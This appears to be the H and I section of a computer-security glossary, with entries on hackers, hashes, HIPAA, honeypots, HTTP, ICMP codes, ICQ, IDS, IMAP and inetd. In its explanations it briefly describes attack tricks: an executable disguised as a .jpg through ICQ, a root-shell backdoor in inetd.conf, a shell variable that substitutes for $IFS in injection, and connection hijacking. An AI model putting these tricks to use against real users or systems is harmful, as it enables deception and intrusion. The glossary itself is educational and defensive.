Key point: The GUID is generated from other "unique" information on a machine, such as the MAC address of the Ethernet adapter. It isn't guaranteed to be absolutely unique, but chances of any two GUIDs in the world being identical are remote.
[ H/P/V/C/A | hacker | hacking | hacktivism | handle | harden | hash | hex | hexadecimal | hexdumps | HHGTTG | hijack | HIPAA | hives | HKEY_CLASSES_ROOT | HKEY_CURRENT_CONFIG | HKEY_CURRENT_USER | HKEY_DYN_DATA | HKEY_LOCALMACHINE | HKEY_USERS | HMAC | honeypot | hook | HOST | host-based | HTTP ]
Consider Arthur C. Clark's Third Law: "Any sufficiently advanced technology is indistinguishable from magic". Since normal people have no clue as to how computers work, they often view hackers with suspicion and awe (as magicians, sorcerers, witches, and warlocks). This suspicion leads to the word "hacker" having the connotation of someone up to no good.
History: The word "hacker" started out in the 14th century to mean somebody who was inexperienced or unskilled at a particular activity (such as a golf hacker).
In the 1970s, the word "hacker" was used by computer enthusiasts to refer to themselves. This reflected the way enthusiasts approach computers: they eschew formal education and play around with the computer until they can get it to work. (In much the same way, a golf hacker keeps hacking at the golf ball until they get it in the hole).
Furthermore, as "experts" learn about the technology, the more they realize how much they don't know (especially about the implications of technology). When experts refer to themselves as "hackers", they are making a Socratic statement that they truly know nothing. For more information on this connotation, see ESR's computer enthusiast "Jargon File".
Key point: Today if you do a quick search of "hacker" in a search engine, you will still occasional uses of the word in senses used in the 1400s and 1970s, but the overwhelming usage in the 1990s describes people who break into computers using their sorcerous ways. Likewise, the vast majority of websites with the word "hack" in their title refer to illegitimate entry into computer systems, with notable exceptions like http://www.hacker.com/ (for golf).
Controversy: The computer-enthusiast community does not like using "hacker" to describe malicious people; they prefer "cracker". The security-community restricts the use of the word "cracker" to some who breaks encryption and copy-protection schemes.
Consequently, a journalist who writes about cybercriminals cannot use either word without hate mail from the opposing community claiming they are using the word incorrectly. If a journalists writes about hackers breaking into computers, they will receive hate-mail claiming that not all hackers are malicious, and the that the correct word is "cracker". Likewise, if they write about crackers breaking into computers, they will receive hate-mail claiming that crackers only break codes, but its hackers who break into systems. The best choice probably depends upon the audience; for example one should definitely talk about malicious crackers in a computer-enthusiast magazine like Linux Today.
Misconception: People believe (incorrectly) that the hacker activists are fighting for a cause. This is rarely true; most hacktivists are normal hackers who use a "cause" to justify their actions. This is similar to the psychology of most terrorist groups. Psychologists say that the average terrorist is simply a violent person looking for a reason to justify their tendancies, rather than being revolutionaries who regret the violence they feel is necessary.
Point: You'll see as many website defacements promoting open-source products like Linux and Apache as for political or religious agendas. This is actually part of the same hacktivist emotions: for many geeks, open-source is a political movement. To them, promoting open-source is as important as solving unrest in Ireland or helping feed starving children in Africa.
Point: Most handles aren't consciously chosen but instead are just the ones that "stick". They might start out as a randomly chosen name on a BBS or the name of a character in Dungeons and Dragons.
Misconception: Having a handle is not related to somebody's skill as a hacker. Likewise, using handles is not related to criminal intent. This is important because the FBI believes otherwise, and in court will attempt to use your handle to help prove that you are part of a nefarious conspiracy and a danger to society.
Example: The following a is a random list of some aliases; it isn't meant to be an exhaustive list or a list of the most famous hackers; it is just some that I can come up with off the top of my head.
Example: Some common uses of hashes are:
Example: The program "tripwire" detects intrusions by calculating a hash of all programs/binaries. On a regular basis, it recalculates the hash. If a file has changed, then the hash will also have changed. Tripwire then "trips" whenever the latest calculated hash of the file does not match the one stored in its database.
Example: Some common hash algorithms are:
See also: integrity
Key point: Hex is so important because 4-bits have 16-possible combinations. Therefore, a 4-bit value can be represented by a single hex digit. In this manner, every byte (8-bits) can be represented by two hex digits.
Key point: Script kiddies tend to dismiss hexadecimal as one of those "unnecessary details". In reality, you must be able to comfortably do hex math in your head, and freely convert with binary. You should also be able to interpret hexdumps, where a block of data is dumped out into columns of hex numbers. A tutorial for this is at http://www.robertgraham.com/pubs/sniffing-faq.html#hexadecimal.
Key point: My mother, an otherwise avowed computerphobe, calculates her age in hex. She is in her early 0x30s. (For those who cannot do the math as well as my mom, 0x30 == 3*16 == 48).
Example: The following quote describes a social engineering attack:
The Hitchhiker's Guide to the Galaxy has a few things to say on the subject of towels.A towel, it says, is about the most massively useful thing an interstellar hitchhiker can have. Partly it has great practical value. You can wrap it around you for warmth as you bound across the cold moons of Jaglan Beta; you can lie on it on the brilliant marble-sanded beaches of Santraginus V, inhaling the heady sea vapors; you can sleep under it beneath the stars which shine so redly on the desert world of Kakrafoon; use it to sail a miniraft down the slow heavy River Moth; wet it for use in hand-to-hand combat; wrap it round your head to ward off noxious fumes or avoid the gaze of the Ravenous Bugblatter Beast of Traal (a mind-bogglingly stupid animal, it assumes that if you can't see it, it can't see you-daft as a brush, but very very ravenous); you can wave your towel in emergencies as a distress signal, and of course dry yourself off with it if it still seems to be clean enough.
More importantly, a towel has immense psychological value. For some reason, if a strag (strag: nonhitchhiker) discovers that a hitchhiker has his towel with him, he will automatically assume that he is also in possession of a toothbrush, washcloth, soap, tin of biscuits, flask, compass, map, ball of string, gnat spray, wet-weather gear, space suit, etc., etc. Furthermore, the strag will then happily lend the hitchhiker any of these or a dozen other items that the hitchhiker might accidentally have "lost." What the strag will think is that any man who can hitch the length and breadth of the Galaxy, rough it, slum it, struggle against terrible odds, win through and still know where his towel is, is clearly a man to be reckoned with.
Hence a phrase that has passed into hitchhiking slang, as in "Hey, you sass that hoopy Ford Prefect? There's a frood who really knows where his towel is." (Sass: know, be aware of, meet, have sex with; hoopy: really together guy; frood: really amazingly together guy.)
Key point: The answer to life, the universe, and everything is 42.
Example: ISPs generally reassign IP addresses of dialing users very quickly after a previous user hung up. Take for example where Alice dials up the Internet, telnets to a host, then for some reason hangs up without gracefully closing the connection. Now consider Mark, who dials-up later and is assigned the same IP address. Let's say that Mark has created his own TCP/IP stack that automatically hijacks any existing connection. The server then sends some response packet back across the connection to Alice (really Mark). At that point, Mark's stack automatically picks up the connection and continues the protocol. At this point, Mark can do anything he wants on Alice's account.
Example: Similar to above, hackers often hijack connections by first nuking one end of the connection, then spoofing that side's IP address.
Example: Spammers scour the Internet looking for open USENET NNTP servers. If they find a server they can post floods of spam through, this is known as "hijacking" the USENET server.
Controversy: The rules extend to any partner that might be contracted by the covered entity, such as telecommunications, computer consultants, legal, accounting, financial, etc. This means that the effect of HIPAA affects a huge portion of the industry outside of health care.
Key point: HIPAA protects against "involuntary disclosure", e.g. a hacker breaks into a computer and steals records. Therefore, HIPAA mandates certain computer security practices (along with physical security etc.). A company will need to have a security officer, document security procedures, conduct risk assessments, encrypt data, keep audit trails, and so forth.
History: The 1974 Privacy Act provided laws governing federal procedures for handling health care records. Numerous other laws govern various parts of handling health care records, often with conflicting goals. These laws were difficult to follow: HIPAA brings them all under a single umbrella.
Key point: HIPAA is so complicated that is has created consultants who specialize in HIPAA. The broad reaching effect means that every security consultant will need to know some things about it.
See also: privacy
Misunderstanding: A common misconception is that by advertising the system or inviting hackers in causes you to lose all rights to prosecute the hacker. Honeypots do not advertise themselves nor invite hackers. They simply sit on the network waiting to be discovered and hacked. If a hacker doesn't search them out, they won't find them. Similarly, honeypots can contain legal notices in their banners telling hackers to go away.
Culture: The term is an outgrowth of the older abbreviation "h/p" (hack/phreak).
Key point: HTTP is text based, so you can use Telnet or netcat as your client (if you understand the protocol). For example, you can telnet www.example.com 80 to connect to a web-service and enter the command GET / HTTP/1.0<cr><cr> in order to download the home page. The diagram below shows a typical request/response exchange between a web-browser and a server:
| Request | Response |
|---|---|
| GET /index.html HTTP/1.0 Accept: */* Referer: http://bob.example.com/ Accept-Language: en-us Accept-Encoding: gzip, deflate If-Modified-Since: Mon, 17 Sep 2001 23:01:31 GMT; length=72 User-Agent: Mozilla/4.0 (compatible; MSIE.5.01; Windows NT 5.0) Host: www.example.com |
HTTP/1.0 304 Not Modified Date: Sat, 24 Nov 2001 12:04:44 GMT Content-Type: text/html Last-Modified: Mon, 17 Sep 2001 23:01:31 GMT Age: 233860 |
Exploits: The most common exploits against HTTP servers are:
[ ice | ICMP | ICMP Format | ICMP Type/Codes | ICQ | id | IDEA | identd | identification | identity | identity theft | IDS | IEEE | IIS | IMAP | IMAP4 | incident | incident team | inetd | information warfare | INFOSEC | infowar | InfraGuard | input validation | integrity | intellectual property | intelligence community | interactive logon | Internet Control Message Protocol | Internet Mail Access Protocol | intrusion | Intrusion Countermeasure Electronics | intrusion detection system | IP | IP address | IPsec | IRC | island-hopping | ISO/IEC 17799-1 | ISP ]
Contrast: Whereas the protocols TCP and UDP carry data, ICMP carries only control messages. Therefore, it is unlikely that a hacker can break into your machine using ICMP. However, evildoers can use ICMP for other purposes:
Misunderstanding: Packet filtering firewalls work by filtering source/destination ports in the TCP or UDP transport protocols. However, as a secondary function, they also filter ICMP type and code numbers. In order to simplify configuration, they sometimes call these fields "ports" in order to make the configuration similar to TCP or UDP.
Key point: A common question is which ICMP traffic should be filtered by a firewall. ICMP consists of "control" messages, some of which are needed, others are desirable, and still others can be used to cause problems on your network. At minimum, you need to allow "can't fragment" messages so that TCP path MTU discovery. People usually like such packets as "destination unreachable" so that connections timeout faster with a more helpful error message. Likewise, users like to do pings and traceroutes through the firewall. Other than that, all other packets should be filtered. In particular, ICMP router advertisements and redirects are extremely bad to allow through your firewall.
An ICMP header is 8-bytes (64-bits) long. It may contain more data depending upon the exact operation being performed.
0 1 2 3
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Type | Code | Checksum |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Type ^ |
This 8-bit field contains the major type number. See http://www.robertgraham.com/pubs/firewall-seen.html#icmp for more information. |
|---|---|
| Code ^ |
This 8-bit field contains the minor type (or subtype). For many types, it is simply zero. |
The full list of these codes is at: http://www.isi.edu/in-notes/iana/assignments/icmp-parameters
| Type | Code | Name | Summary |
| 0 | * | Echo Reply ICMP_ECHOREPLY ping reply |
A response to a ping. Many firewalls allow ping
responses so that internal people can gain access to external resources.
Therefore, they are an effective flooding technique. This means they
also work well as a covert-channel.
The massive DDoS
attacks that took down the major Internet portals used commands embedded
within ping responses to initiate the attacks. One of the attacks also
used ping replies to flood the servers. Firewall: Either block incoming ping responses or rate limit them. [more] |
| 3 | * | Destination Unreachable ICMP_UNREACH |
An indication back from a host/router that some you
sent packet did not reach its destination. Firewall: In practice, these are needed simply for helpful error messages why communication failed. The only one strictly needed through a firewall is the one that indicates a router couldn't fragment a packet. [more] |
| 0 | Net Unreachable ICMP_UNREACH_NET |
Route configuration problem or incorrectly specified
IP address. [more] | |
| 1 | Host Unreachable ICMP_UNREACH_HOST |
It means that the router one hop before the desired host could not ARP the host. | |
| 2 | Protocol Unreachable ICMP_UNREACH_PROTOCOL |
This means that the receiver of the packet does not
have anything that recognizes the specified IP protocol of the packet. Key point: This is almost never seen on the wire in practice, and either indicates and intrusion or some massive configuration error. | |
| 3 | Port unreachable ICMP_UNREACH_PORT |
The server tells the client that nobody is listening
at the port the client attempted to contact. [more] | |
| 4 | Fragmentation Needed but DF
set ICMP_UNREACH_NEEDFRAG |
Important: If you are seeing these in your
firewall reject logs, then you've misconfigured your firewall. You
should allow this packet to pass through, otherwise your clients will
see their TCP connections mysteriously hang. [more] | |
| 4 | * | Source Quench ICMP_SOURCEQUENCH |
Congestion on the Internet. Somebody could flood your
network with these packets in an attempt to convince your machines to
slow down transmitting data. [more] |
| 5 | * | Redirect ICMP_REDIRECT |
Somebody is trying to redirect your default router.
This could be from a hacker trying to execute a man-in-the-middle attack
against you by causing you to route through their own machine. [RFC792] |
| 8 | * | Echo Request ICMP_ECHO Ping |
Ping. [more] |
| 9 | * | Router Advertisement ICMP_ROUTERADVERT |
There is exists a hack against Win9x and Solaris such
that a hacker can DoS you by redirecting your default router. A
neighboring hacker can also do a man-in-the-middle attack by directing
you through his/her router. [RFC1256] |
| 11 | * | Time Exceeded In Transit ICMP_TIMXCEED |
It means that a packet never reached its target because something timed out. |
| 0 | TTL Exceeded ICMP_TIMXCEED_INTRANS |
Router dropped the packet either because of a
routing loop or maybe because of a traceroute. [more] | |
| 1 | Fragment reassembly timeout ICMP_TIMXCEED_REASS |
The host dropped the packet because it didn't receive
all the fragments. [more] | |
| 12 | * | Parameter Problem | Something unusual is going on, and probably indicates
an attack. [more] |
| 13 | * | Timestamp ICMP_TSTAMP |
[RFC792] |
| 14 | * | Timestamp Reply ICMP_TSTAMPREPLY |
[RFC792] |
Key point: ICQ is a favorite service among hackers, and ICQ features are built into many trojans (such as stealing user's passwords, UINs, or notifying the hacker).
Vulnerabilities: Some versions contain a built-in web-server that under Win9x can be used to access any file on the system. Some versions have a problem such that you can send a file to a victim with the filename:
foo.jpg .exeThis is really a program, but it appears to the user as a .jpg file, so they will simply open it, not realizing it is program. ICQ inboxes can be easily flooded; there are lots of attacks/countermeasures floating around on the Internet for this. Finding somebody's IP address given their UIN is a hot topic: Mirabilis tries to hide this, but lots of tools exist to discover it anyway.
Key point: This is often the first command a hacker will run on the system when the hacker breaks in remotely. The hacker will remotely compromise a service that is running under either root account, a special account setup for that service (e.g. the majordomo service runs under a user account called "majordomo"), or a user's account. The hacker is hoping they have achieved root access immediately. If not, the hacker will have to run a local exploit in order to elevate privileges. The other popular command hackers might execute is id.
Example: Running id as root on one of my systems results in:
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy)
Controversy: IDEA is one of the few (widely-used) ciphers protected by patents; it requires a license for commercial use. PGP is no longer using IDEA as its default cipher because of this.
Notes: It was developed by Xuejia Lai and James L. Massey. It uses 128-bit keys. There is no known way to break it other than brute-force. It was published in 1990. Its patents are held by the Swiss company "Ascom-Tech AG".
Misconception: The name implies that IDEA is some sort of official standard -- it isn't. However, it is is widely used, and is an option on many standards.
Applications: PGP
Example: When you connect to a UNIX-based mail server, it will usually attempt a reverse connection back to you on the identd port 113. Its goal is simply to log which user was attempting access to the server.
Key point: The ways to steal personal information:
Tips: Lock away your Social Security card, birth certificate, passport, and any other piece of information that can be used to prove who you are. Always shred receipts, and allways take credit card and ATM receipts back home to be shredded. Shred all mail. Review credit-card and phone bills. Review your credit reports every couple years. Never give out your Social Security number unless required (it isn't required for health insurance, but it is required for anything related to income). Do not list your telephone number in the phone book. Make a list of all accounts (savings, credit, etc.).
Contrast: A host-based IDS monitor system events, logfiles, and so forth. A network-based IDS monitors network traffic, usually promiscuously.
Contrast: A firewall simply blocks openings into your network/system, but cannot distinguish between good/bad activity. Therefore, if you need to allow an opening to a system (like a web-server), then a firewall cannot protect against intrusion attempts against this opening. In contrast, intrusion detection systems can monitor for hostile activity on these openings.
More: See http://www.robertgraham.com/pubs/network-intrusion-detection.html for more info.
Tidbit: On Linux, the $FF variable may also be used like $IFS.
Key point: At the end of 1999, all freshly installed IIS v4.0 servers were vulnerable to the .htr buffer overflow bug and the RDO exploit. Roughly 90% of IIS servers are not sufficiently hardened against these exploits, and are thus vulnerable to being owned or defaced.
Key point: IMAP is important to hackers because many implementations are vulnerable to buffer overflow exploits. In particular, a popular distribution of Linux shipped with a vulnerable IMAP service that was enabled by default. Therefore, even today, security professionals frequently detect scans directed at port 143 looking for vulnerable IMAP servers.
Key point: The following are useful resources to such a team:
The file /etc/inetd.conf configures this service.
Key point: A common backdoor technique is to place a root shell program in inetd.conf.
Contrast: The term "information security" distinguishes itself from "physical security".
Key point: A common model used to describe security is the OSI/ISO/IEC 10181 standard. It breaks down infosec into the following areas:
Key point: The most common threats are:
Key point: The fields of infosec and hacking are not necessarily related. This is a little confusing. Infosec is the field of assuring that information is secure. Hacking is the field of breaking rules. For example, following infosec best practices, you can validate that a server is secure, data is encrypted, and that only authenticated users can gain access. However, a hacker executing a buffer overflow exploit gains access bypassing all the security measures.
Contrast: The military has a number of terms related to INFOSEC. They include:
Contrast: Information is gathered from InfraGuard chapters and funneled up to the NIPC, which analyzes and cleanses the data, and distributes it back out to its members.
Examples:
See also: buffer overflow, backtracking
Key point: Network logons can be disabled for administrators. This prevents people from stealing passwords and remotely administering the machine. This makes security easier because the server can be controlled via physical security.
Contrast: Unix has similar concepts. A local logon is through the "console". Often, root access will be denied to remote logons. Both Windows and Unix have the concept of remotely logging on via one user account, then using that account to locally upgrade to root/administrator.
Contrast:
Contrast: